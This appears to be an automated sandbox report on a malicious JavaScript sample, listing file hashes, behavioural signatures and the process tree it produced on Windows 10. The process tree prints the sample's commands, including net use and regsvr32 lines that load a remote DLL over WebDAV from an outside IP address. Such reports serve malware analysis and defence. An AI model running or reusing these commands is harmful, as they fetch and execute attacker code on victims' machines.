Analysis
-
max time kernel
94s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
11-07-2024 10:07
Static task
static1
Behavioral task
behavioral1
Sample
7251917789216994.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
7251917789216994.js
Resource
win10v2004-20240709-en
General
-
Target
7251917789216994.js
-
Size
5KB
-
MD5
e9ba8f97cdbcf9d71ee30d92d5b4b773
-
SHA1
d5e0449ac912845a1bacce1e0c0317453b1af5e8
-
SHA256
8484d0ed474257524be52f0f36b08d59c41aa145ca2641b2190dc01714876593
-
SHA512
026fa58e08f5e8096fb5fd5dbb26efeefc8ce11619b46e074ddb586119817d8796b78652a5cacb7676d2bc165b6acb11cdd55067f2a40c26f9745e18eb463217
-
SSDEEP
96:t7P2pY4DAIo53FqGb53AQ4AW8223VcY3LorkZoe:tqpY4LPa2wcrkme
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1340 wrote to memory of 1480 1340 wscript.exe 83 PID 1340 wrote to memory of 1480 1340 wscript.exe 83 PID 1480 wrote to memory of 3520 1480 cmd.exe 85 PID 1480 wrote to memory of 3520 1480 cmd.exe 85 PID 1480 wrote to memory of 3016 1480 cmd.exe 87 PID 1480 wrote to memory of 3016 1480 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7251917789216994.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\7251917789216994.js" "C:\Users\Admin\\tbopzt.bat" && "C:\Users\Admin\\tbopzt.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3520
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\966.dll3⤵PID:3016
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5e9ba8f97cdbcf9d71ee30d92d5b4b773
SHA1d5e0449ac912845a1bacce1e0c0317453b1af5e8
SHA2568484d0ed474257524be52f0f36b08d59c41aa145ca2641b2190dc01714876593
SHA512026fa58e08f5e8096fb5fd5dbb26efeefc8ce11619b46e074ddb586119817d8796b78652a5cacb7676d2bc165b6acb11cdd55067f2a40c26f9745e18eb463217